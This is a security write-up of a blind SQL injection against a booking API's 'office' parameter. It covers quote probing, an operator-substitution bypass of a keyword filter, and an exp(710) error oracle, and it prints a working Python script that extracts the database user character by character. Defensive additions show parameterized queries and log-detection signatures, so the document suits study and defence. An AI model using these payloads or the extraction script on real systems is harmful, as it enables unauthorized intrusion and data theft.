0x01 Detecting the injection

Normal request:
(screenshot: 20590-asb8wd9jr5k.png)

Appending a single quote to the office parameter makes the page report an unknown application-level error.

(screenshot: 50371-dmf2z504yyn.png)

The underlying statement is presumably something like:

select xxx from xxx where office='wankezhongxin''

Two single quotes work normally.
(screenshot: 65151-vz0u7m0isr9.png)

The statement is then roughly:

select xxx from xxx where office='wankezhongxin'''
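The error-on-one-quote, fine-on-two-quotes behaviour above is what string concatenation into a SQL literal looks like from the outside. The following is an added example (not code from the original post or from the application it describes) that reproduces that behaviour against an in-memory SQLite table, using a constructed table and column name standing in for the real ones, and places the fix beside it: a bound parameter is never parsed as SQL, so the same inputs simply fail to match instead of changing the statement. The keyword filter the post later runs into is not a substitute for this.

```python
import sqlite3

# Constructed stand-in for the application's table (names are assumptions).
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE meeting_room (id INTEGER, office TEXT)")
    con.executemany("INSERT INTO meeting_room VALUES (?, ?)",
                    [(1, "wankezhongxin"), (2, "other")])
    return con

def lookup_vulnerable(con, office):
    """User input is spliced into the SQL text, the pattern the post's
    error behaviour points to. Returns matching ids, or an error string."""
    sql = "SELECT id FROM meeting_room WHERE office='" + office + "'"
    try:
        return [row[0] for row in con.execute(sql)]
    except sqlite3.OperationalError as e:
        # One stray quote leaves the literal unterminated; the application
        # in the post surfaced this as an "unknown application error".
        return "error: " + str(e)

def lookup_parameterized(con, office):
    """Same query with a bound parameter: quotes and keywords inside the
    value are data, never SQL syntax."""
    sql = "SELECT id FROM meeting_room WHERE office=?"
    return [row[0] for row in con.execute(sql, (office,))]

if __name__ == "__main__":
    con = make_db()
    for probe in ("wankezhongxin", "wankezhongxin'", "wankezhongxin''",
                  "wankezhongxin'and'1'='1"):
        print(repr(probe), "->",
              "concat:", lookup_vulnerable(con, probe),
              "| bound:", lookup_parameterized(con, probe))
```

With concatenation the single quote produces a parse error, the doubled quote is silently swallowed as an escaped quote (no error, no match), and the `'and'1'='1` probe is executed as a boolean expression; with the bound parameter every one of them is just a value that matches nothing.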

0x02 Injection approach

Since the response echoes data, I initially planned to go for a UNION, so the first thing I tried was commenting out the rest of the statement:

wankezhongxin'#

(screenshot: 57285-vf9a4jfv0a.png)

But none of the comment variants I tested worked:

wankezhongxin'#
wankezhongxin'--+
wankezhongxin')#
wankezhongxin')--+
.....

Then I tried whether the quote could simply be closed instead; that still produced an error:

wankezhongxin'and'1'='1

At this point I suspected that the code layer was intercepting or filtering something.

(screenshot: 65535-qo11t26e2an.png)

Replacing and with &, or with any of - + * / ^ |, works.

(screenshot: 29637-i8f84seti0i.png)

Next comes constructing a true state and a false state. Here exp(1) and exp(710) are combined with if(); note that exp(710) produces an error in MySQL. With 1=1 the request succeeds:

'& if(1=1,exp(1),exp(710)) &'

(screenshot: 27139-327rn9hkkbd.png)

With 1=2 it errors:

(screenshot: 26152-3ma3x5mvoam.png)

0x03 Retrieving the username

During testing, user(), database() and the like all errored, so the username is read through CURRENT_USER, which gives the same result as user().

(screenshot: 01820-yk1jp050ttg.png)

Manual testing shows the length is 21:

'& if(length(CURRENT_USER)=21,exp(1),exp(710)) &'1

(screenshot: 81500-ptxxvo3y34b.png)

A binary-search script then extracts the actual value:

import requests
import time

url = "https://xxxxxx.com"  # target endpoint, redacted in the original
headers = {"Connection": "close", "sec-ch-ua": "\"Google Chrome\";v=\"89\", \"Chromium\";v=\"89\", \";Not A Brand\";v=\"99\"", "Accept": "application/json, text/plain, */*", "empId": "20228530", "sec-ch-ua-mobile": "?0", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "Origin": "https://XXXXX", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Dest": "empty", "Referer": "XXXXXXXX", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Content-Type": "application/json;charset=UTF-8"}

name = ''
no = r'101'  # marker present in the response body when the query errors
for j in range(1, 22):  # the username was found to be 21 characters long
    l = 32   # search window over printable ASCII
    h = 127
    while abs(l - h) > 1:
        i = int((l + h) / 2)
        # exp(1) (no error) when the j-th character is > i, exp(710) (error) otherwise;
        # substr takes a single character, the original passed i as the length
        burp0_json = {"city": "shanghai", "endTime": "24:00", "meetingDay": "2022-05-09",
                      "office": "'& if(ascii(substr(CURRENT_USER," + str(j) + ",1))>" + str(i) + ",exp(1),exp(710)) &'1",
                      "startTime": "9:00"}
        r = requests.post(url, headers=headers, json=burp0_json)
        time.sleep(0.2)
        if no not in r.text:  # no error: the character is greater than i
            l = i
        else:                 # error: the character is at most i
            h = i
    name += chr(h)  # window closes with h equal to the character code
    print(chr(h))
print(name)

Result:
(screenshot: 34092-zby3sbeefzq.png)
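The probes used throughout this post leave a recognisable trail in request logs: a quote immediately followed by an operator standing in for AND, an if() wrapped around exp(710), ascii(substr(...)) extraction, and one source sending many such requests against the same field. The block below is an added example (not part of the original post) of detection logic for a WAF or log pipeline; the log line format (source IP followed by the JSON body) and the sample lines are constructed here, with payloads taken from the post.

```python
import json
import re
from collections import defaultdict

# Signatures derived from the probes in the post. quote_operator alone is a weak
# signal (legitimate text can contain an apostrophe before "&"); the conditional
# error and extraction patterns are strong, and repetition from one source is strongest.
SIGNATURES = {
    "quote_operator": re.compile(r"'\s*[&|^*/+-]\s*"),
    "quote_boolean": re.compile(r"'\s*(?:and|or)\b", re.I),
    "conditional_error": re.compile(r"\bif\s*\(.*?exp\s*\(\s*710\s*\)", re.I),
    "char_extraction": re.compile(r"ascii\s*\(\s*substr\s*\(", re.I),
    "stacked_quotes": re.compile(r"'{2,}"),
}

def scan_value(value):
    """Names of the signatures that match one parameter value."""
    return [name for name, rx in SIGNATURES.items() if rx.search(value)]

def scan_request(body):
    """Scan every string field of a JSON request body; returns {field: [signatures]}."""
    hits = {}
    for field, value in json.loads(body).items():
        if isinstance(value, str):
            sigs = scan_value(value)
            if sigs:
                hits[field] = sigs
    return hits

def flag_sources(log_lines, threshold=3):
    """Count flagged requests per (source, field). A source that trips the
    signatures repeatedly on the same field looks like the character-by-character
    loop of the script above rather than a one-off typo."""
    counts = defaultdict(int)
    for line in log_lines:
        src, body = line.split(" ", 1)
        for field in scan_request(body):
            counts[(src, field)] += 1
    return {key: n for key, n in counts.items() if n >= threshold}

def _line(src, **fields):
    return src + " " + json.dumps(fields)

# Constructed sample log: one benign request, one single probe, and one source
# running an extraction loop against the office field.
SAMPLE_LOG = [
    _line("10.0.0.5", city="shanghai", office="wankezhongxin"),
    _line("10.0.0.7", office="wankezhongxin'and'1'='1"),
    _line("10.0.0.9", office="wankezhongxin''"),
    _line("10.0.0.9", office="'& if(ascii(substr(CURRENT_USER,1,1))>64,exp(1),exp(710)) &'1"),
    _line("10.0.0.9", office="'& if(ascii(substr(CURRENT_USER,1,1))>96,exp(1),exp(710)) &'1"),
    _line("10.0.0.9", office="'& if(ascii(substr(CURRENT_USER,2,1))>64,exp(1),exp(710)) &'1"),
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        src, body = line.split(" ", 1)
        print(src, scan_request(body))
    print("flagged:", flag_sources(SAMPLE_LOG))
```

The per-request scan is what a WAF rule would do; the per-source count is the piece that matters for a blind injection, because each individual request returns nothing sensitive and only the sequence reveals the extraction. Tune the threshold and add the fields the application actually exposes.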

Last modified: 9 August 2022